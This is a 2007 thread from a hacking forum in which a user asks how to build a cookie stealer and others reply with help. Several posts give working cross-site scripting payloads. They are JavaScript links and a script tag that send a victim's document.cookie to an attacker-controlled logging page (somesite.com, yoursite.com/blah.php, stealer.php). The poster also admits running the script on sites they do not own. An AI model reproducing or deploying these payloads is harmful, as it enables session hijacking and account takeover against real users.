Follow us on Twitter!
The measure of a mans life is not how well he dies, but how well he lives.
Monday, November 20, 2017
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 78
Guests Online: 75
Members Online: 3

Registered Members: 103057
Newest Member: isam45
Latest Articles
View Thread

HellBound Hackers | Challenges | Basic

Author

Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 12-04-07 20:32
Sorry wrong forum*

Hi, I'm trying to create a cookie stealer and not like this witch I quite fast was abel to create:
Code
<a href="javascript: location.href='http://somesite.com?cookie='+document.cookie">Klick me</a>




What I want to create is something like this
Code
<a href="javascript: location.href='http://victim.com'; location.href='http://somesite.com?cookie='+document.cookie">Klick me</a>



That does not work, why I dont know. I've tried alot of things but nothing works.

I hope someone knows how to do this, and that my English is good enought for understanding.

NOTE: this is not a script I will use to attack any sites but my own. It is only for fun and learning.

Thanks!




Edited by on 12-04-07 20:35
Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-07 21:45
Only for your own site huh? Somehow I doubt it.. haha, anyway you're going to need to use some PHP to do this.


Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-07 22:55
Yes for my own site for learning and fun, doubt it if you want. Do you have a link or something to a site where I can read about it or can you explain more detailed?

thanks


Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-07 23:01
<script>
document.location = 'http://yoursite.com/blah.php?cookie=' + document.cookie;
</script>

the blah script needs to GET the GET, if you know what I mean. Then write it to a .txt or something.


Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-07 23:02
try something like this

Code

<a href="javascript: window.location.href='http://www.site.com/stealer.php?c='+document.cookie">Here</a>





and stealer.php has a code getting the GET var and logging it or echoing or whatever.

[EDIT]I didnt see spyware's post, its basically the same thing[/EDIT]




Edited by on 13-04-07 23:03
Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-07 23:16
Thanks, but I've already created a php script for logging the cookie in a txt file. I had only problems becaues the script you show is a script that requiers that you post it on the site you want to steal the cookie from. What I want is that for example: a user checks my site called hacker.com/cookie.php and clicks on a link and therby gets redirected to for example hotmail.com. When the user is att hotmail .com then it redirects the user back to my site (hacker.com/stolen.php?cookie=the cookie).

I was able to create a script for this but it did not work on every site i tested.
Okay I have to admit I used this script on 2 other sites that was not my own but I have no intention of hacking them and I am allowed to do so by the admin.




Edited by on 13-04-07 23:21
Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-04-07 23:51
what you are trying to do is impossible then because only the cookies of a local site can be accessed by javascript's document.cookie. So unless you put the link on hotmail, it wont work.


Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 14-04-07 03:55
Try searching for a cross site scripting way to do it. (XSS) Search on google XSS cookie stealer. Might help.


Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 14-04-07 03:59
Try searching for a cross site scripting way to do it. (XSS) Search on google XSS cookie stealer. Might help.


Author

RE: Cookie stealing


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 14-04-07 03:59
Try searching for a cross site scripting way to do it. (XSS) Search on google XSS cookie stealer. Might help.